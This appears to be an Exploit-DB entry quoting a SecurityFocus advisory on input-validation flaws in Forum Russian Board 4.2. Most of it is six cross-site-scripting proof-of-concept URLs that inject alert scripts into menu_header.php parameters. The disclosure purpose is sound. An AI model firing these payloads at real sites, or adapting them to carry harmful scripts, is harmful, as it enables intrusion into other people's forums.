https://www.exploit-db.com/exploits/25878

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/14045/info
  
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
  
Forum Russian Board 4.2 is reported to be affected. 

menu_header.php?board_user_name=<script>alert("XSS");</script>
menu_header.php?board_user_name=1&color_panel_edit=><script>alert("XSS");</script>
menu_header.php?target=><script>alert("XSS");</script>
menu_header.php?patch_images="><script>alert("XSS");</script>
menu_header.php?font_color_panel=><script>alert("XSS");</script>
menu_header.php?body_color_forum=><script>alert("XSS");</script>